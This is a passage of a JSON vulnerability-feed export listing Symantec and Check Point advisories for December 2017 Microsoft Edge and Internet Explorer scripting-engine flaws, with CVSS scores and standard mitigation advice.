"https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/102062", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-03-13T12:08:08", "description": "### Description\n\nMicrosoft Edge is prone to a remote memory-corruption vulnerability. Attackers can exploit this issue to execute arbitrary code in the context of the currently logged-in user. Failed attacks will cause denial of service conditions.\n\n### Technologies Affected\n\n * Microsoft ChakraCore \n * Microsoft Edge \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\n**Implement multiple redundant layers of security.** \nMemory-protection schemes (such as nonexecutable stack and heap configurations and randomly mapped memory segments) will complicate exploits of memory-corruption vulnerabilities.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "cvss3": {}, "published": "2017-12-12T00:00:00", "type": "symantec", "title": "Microsoft Edge Scripting Engine CVE-2017-11905 Remote Memory Corruption Vulnerability", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2017-11905"], "modified": "2017-12-12T00:00:00", "id": "SMNTC-102050", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/102050", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-03-12T06:25:09", "description": "### Description\n\nMicrosoft Edge is prone to a remote memory-corruption vulnerability. Attackers can exploit this issue to execute arbitrary code in the context of the currently logged-in user. Failed attacks will cause denial of service conditions.\n\n### Technologies Affected\n\n * Microsoft ChakraCore \n * Microsoft Edge \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\n**Implement multiple redundant layers of security.** \nMemory-protection schemes (such as nonexecutable stack and heap configurations and randomly mapped memory segments) will complicate exploits of memory-corruption vulnerabilities.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "cvss3": {}, "published": "2017-12-12T00:00:00", "type": "symantec", "title": "Microsoft Edge Scripting Engine CVE-2017-11910 Remote Memory Corruption Vulnerability", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2017-11910"], "modified": "2017-12-12T00:00:00", "id": "SMNTC-102086", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/102086", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-03-13T14:30:46", "description": "### Description\n\nMicrosoft Edge is prone to a remote memory-corruption vulnerability. Attackers can exploit this issue to execute arbitrary code in the context of the currently logged-in user. Failed attacks will cause denial of service conditions.\n\n### Technologies Affected\n\n * Microsoft ChakraCore \n * Microsoft Edge \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\n**Implement multiple redundant layers of security.** \nMemory-protection schemes (such as nonexecutable stack and heap configurations and randomly mapped memory segments) will complicate exploits of memory-corruption vulnerabilities.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "cvss3": {}, "published": "2017-12-12T00:00:00", "type": "symantec", "title": "Microsoft Edge Scripting Engine CVE-2017-11909 Remote Memory Corruption Vulnerability", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2017-11909"], "modified": "2017-12-12T00:00:00", "id": "SMNTC-102085", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/102085", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-03-14T22:40:00", "description": "### Description\n\nMicrosoft Edge is prone to a remote memory-corruption vulnerability. Attackers can exploit this issue to execute arbitrary code in the context of the currently logged-in user. Failed attacks will cause denial of service conditions.\n\n### Technologies Affected\n\n * Microsoft ChakraCore \n * Microsoft Edge \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\n**Implement multiple redundant layers of security.** \nMemory-protection schemes (such as nonexecutable stack and heap configurations and randomly mapped memory segments) will complicate exploits of memory-corruption vulnerabilities.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "cvss3": {}, "published": "2017-12-12T00:00:00", "type": "symantec", "title": "Microsoft Edge Scripting Engine CVE-2017-11911 Remote Memory Corruption Vulnerability", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2017-11911"], "modified": "2017-12-12T00:00:00", "id": "SMNTC-102087", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/102087", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-03-12T04:25:06", "description": "### Description\n\nMicrosoft Edge is prone to a remote memory-corruption vulnerability. Attackers can exploit this issue to execute arbitrary code in the context of the currently logged-in user. Failed attacks will cause denial of service conditions.\n\n### Technologies Affected\n\n * Microsoft ChakraCore \n * Microsoft Edge \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\n**Implement multiple redundant layers of security.** \nMemory-protection schemes (such as nonexecutable stack and heap configurations and randomly mapped memory segments) will complicate exploits of memory-corruption vulnerabilities.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "cvss3": {}, "published": "2017-12-12T00:00:00", "type": "symantec", "title": "Microsoft Edge Scripting Engine CVE-2017-11914 Remote Memory Corruption Vulnerability", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2017-11914"], "modified": "2017-12-12T00:00:00", "id": "SMNTC-102088", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/102088", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-06-08T19:04:25", "bulletinFamily": "software", "cvelist": ["CVE-2017-11930"], "description": "### Description\n\nMicrosoft Internet Explorer and Edge are prone to a remote memory-corruption vulnerability. Attackers can exploit this issue by enticing an unsuspecting user to view a specially crafted web page. Attackers can exploit this issue to execute arbitrary code in the context of the currently logged-in user. Failed attacks will cause denial of service conditions.\n\n### Technologies Affected\n\n * Microsoft ChakraCore \n * Microsoft Internet Explorer 11 \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\n**Implement multiple redundant layers of security.** \nMemory-protection schemes (such as nonexecutable stack and heap configurations and randomly mapped memory segments) will complicate exploits of memory-corruption vulnerabilities.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "edition": 2, "modified": "2017-12-12T00:00:00", "id": "SMNTC-102058", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/102058", "published": "2017-12-12T00:00:00", "type": "symantec", "title": "Microsoft Internet Explorer CVE-2017-11930 Remote Memory Corruption Vulnerability", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-06-08T19:04:25", "description": "### Description\n\nMicrosoft Internet Explorer are prone to a remote memory-corruption vulnerability. Attackers can exploit this issue by enticing an unsuspecting user to view a specially crafted web page. Attackers can exploit this issue to execute arbitrary code in the context of the currently logged-in user. Failed attacks will cause denial of service conditions.\n\n### Technologies Affected\n\n * Microsoft Internet Explorer 10 \n * Microsoft Internet Explorer 11 \n * Microsoft Internet Explorer 9 \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\n**Implement multiple redundant layers of security.** \nMemory-protection schemes (such as nonexecutable stack and heap configurations and randomly mapped memory segments) will complicate exploits of memory-corruption vulnerabilities.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "edition": 2, "cvss3": {}, "published": "2017-12-12T00:00:00", "type": "symantec", "title": "Microsoft Internet Explorer CVE-2017-11890 Remote Memory Corruption Vulnerability", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2017-11890"], "modified": "2017-12-12T00:00:00", "id": "SMNTC-102082", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/102082", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-06-08T19:04:25", "bulletinFamily": "software", "cvelist": ["CVE-2017-11913"], "description": "### Description\n\nMicrosoft Internet Explorer are prone to a remote memory-corruption vulnerability. Attackers can exploit this issue by enticing an unsuspecting user to view a specially crafted web page. Attackers can exploit this issue to execute arbitrary code in the context of the currently logged-in user. Failed attacks will cause denial of service conditions.\n\n### Technologies Affected\n\n * Microsoft Internet Explorer 10 \n * Microsoft Internet Explorer 11 \n * Microsoft Internet Explorer 9 \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\n**Implement multiple redundant layers of security.** \nMemory-protection schemes (such as nonexecutable stack and heap configurations and randomly mapped memory segments) will complicate exploits of memory-corruption vulnerabilities.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "edition": 2, "modified": "2017-12-12T00:00:00", "id": "SMNTC-102091", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/102091", "published": "2017-12-12T00:00:00", "type": "symantec", "title": "Microsoft Internet Explorer CVE-2017-11913 Remote Memory Corruption Vulnerability", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-06-08T19:04:25", "description": "### Description\n\nMicrosoft Internet Explorer and Edge are prone to a remote memory-corruption vulnerability. Attackers can exploit this issue by enticing an unsuspecting user to view a specially crafted web page. Attackers can exploit this issue to execute arbitrary code in the context of the currently logged-in user. Failed attacks will cause denial of service conditions. Internet Explorer 11 and Edge are vulnerable.\n\n### Technologies Affected\n\n * Microsoft ChakraCore \n * Microsoft Edge \n * Microsoft Internet Explorer 11 \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\n**Implement multiple redundant layers of security.** \nMemory-protection schemes (such as nonexecutable stack and heap configurations and randomly mapped memory segments) will complicate exploits of memory-corruption vulnerabilities.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "edition": 2, "cvss3": {}, "published": "2017-12-12T00:00:00", "type": "symantec", "title": "Microsoft Internet Explorer and Edge CVE-2017-11912 Remote Memory Corruption Vulnerability", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2017-11912"], "modified": "2017-12-12T00:00:00", "id": "SMNTC-102092", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/102092", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-06-08T19:04:25", "description": "### Description\n\nMicrosoft Internet Explorer is prone to a remote memory-corruption vulnerability. Attackers can exploit this issue to execute arbitrary code in the context of the currently logged-in user. Failed attacks will cause denial of service conditions. Internet Explorer 10 and 11 are vulnerable.\n\n### Technologies Affected\n\n * Microsoft Internet Explorer 10 \n * Microsoft Internet Explorer 11 \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\n**Implement multiple redundant layers of security.** \nMemory-protection schemes (such as nonexecutable stack and heap configurations and randomly mapped memory segments) will complicate exploits of memory-corruption vulnerabilities.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "edition": 2, "cvss3": {}, "published": "2017-12-12T00:00:00", "type": "symantec", "title": "Microsoft Internet Explorer Scripting Engine CVE-2017-11901 Remote Memory Corruption Vulnerability", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2017-11901"], "modified": "2017-12-12T00:00:00", "id": "SMNTC-102046", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/102046", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-06-08T19:04:25", "description": "### Description\n\nMicrosoft Internet Explorer is prone to a remote memory-corruption vulnerability. Attackers can exploit this issue to execute arbitrary code in the context of the currently logged-in user. Failed attacks will cause denial of service conditions. Internet Explorer 9, 10 and 11 are vulnerable.\n\n### Technologies Affected\n\n * Microsoft Internet Explorer 10 \n * Microsoft Internet Explorer 11 \n * Microsoft Internet Explorer 9 \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\n**Implement multiple redundant layers of security.** \nMemory-protection schemes (such as nonexecutable stack and heap configurations and randomly mapped memory segments) will complicate exploits of memory-corruption vulnerabilities.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "edition": 2, "cvss3": {}, "published": "2017-12-12T00:00:00", "type": "symantec", "title": "Microsoft Internet Explorer Scripting Engine CVE-2017-11903 Remote Memory Corruption Vulnerability", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2017-11903"], "modified": "2017-12-12T00:00:00", "id": "SMNTC-102047", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/102047", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-06-08T19:04:25", "description": "### Description\n\nMicrosoft Internet Explorer is prone to a remote memory-corruption vulnerability. Attackers can exploit this issue to execute arbitrary code in the context of the currently logged-in user. Failed attacks will cause denial of service conditions. Internet Explorer 9, 10 and 11 are vulnerable.\n\n### Technologies Affected\n\n * Microsoft Internet Explorer 10 \n * Microsoft Internet Explorer 11 \n * Microsoft Internet Explorer 9 \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\n**Implement multiple redundant layers of security.** \nMemory-protection schemes (such as nonexecutable stack and heap configurations and randomly mapped memory segments) will complicate exploits of memory-corruption vulnerabilities.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "edition": 2, "cvss3": {}, "published": "2017-12-12T00:00:00", "type": "symantec", "title": "Microsoft Internet Explorer Scripting Engine CVE-2017-11907 Remote Memory Corruption Vulnerability", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2017-11907"], "modified": "2017-12-12T00:00:00", "id": "SMNTC-102045", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/102045", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "checkpoint_advisories": [{"lastseen": "2021-12-17T11:31:14", "description": "An information disclosure vulnerability exists in Microsoft Windows. The vulnerability is due to improper parsing of the InfoTech Storage (ITS) protocol requests. A remote attacker could exploit this vulnerability by enticing a user to open a malicious webpage or URL.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 6.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 3.6}, "published": "2018-01-03T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Windows ITS Protocol Information Disclosure (CVE-2017-11927)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11927"], "modified": "2018-01-04T00:00:00", "id": "CPAI-2018-0007", "href": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-12-17T11:31:42", "description": "A remote code execution vulnerability exists in Microsoft Edge. The vulnerability is due to the way the scripting engine handles objects in memory. An attacker could exploit this vulnerability by enticing the target user to open a specially crafted web page.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-12-12T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Edge Scripting Engine Memory Corruption (CVE-2017-11893)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11893"], "modified": "2018-05-29T00:00:00", "id": "CPAI-2017-1033", "href": "", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-17T11:32:25", "description": "A Memory Corruption Vulnerability exists in Microsoft Edge. The vulnerability is due to the way JavaScript engine renders when handling objects in memory. A remote unauthenticated attacker could exploit this vulnerability by enticing the target user to open a specially crafted web page.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-12-12T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Edge Scripting Engine Memory Corruption (CVE-2017-11889)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11889"], "modified": "2017-12-25T00:00:00", "id": "CPAI-2017-1034", "href": "", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-17T11:32:27", "description": "An information disclosure vulnerability exists in Microsoft Internet Explorer. The vulnerability is due to the way the scripting engine improperly handles objects in memory in Internet Explorer. A remote attacker can exploit this issue by enticing a user to open a specially crafted web-page with an affected version of Microsoft Internet Explorer.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 3.6}, "published": "2017-12-20T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Internet Explorer Scripting Engine Information Disclosure (CVE-2017-11906)", "bulletinFamily": "info", "cvss2": {"severity": "LOW", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.6, "vectorString": "AV:N/AC:H/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11906"], "modified": "2017-12-20T00:00:00", "id": "CPAI-2017-1081", "href": "", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-12-17T11:32:33", "description": "A Type Confusion vulnerability exists in Microsoft Browsers. The vulnerability is due to the way JavaScript engine renders when handling objects in memory. Successful exploitation of this vulnerability can achieve Remote Code Execution.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-12-12T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Browser Scripting Engine Memory Corruption (CVE-2017-11895)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11895"], "modified": "2017-12-12T00:00:00", "id": "CPAI-2017-1035", "href": "", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-17T11:32:37", "description": "A remote code execution vulnerability exists in Microsoft Explorer. The vulnerability is in the way that Microsoft browser VBScript engines render content when handling objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-12-12T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Internet Explorer Scripting Engine Memory Corruption (CVE-2017-11886)", 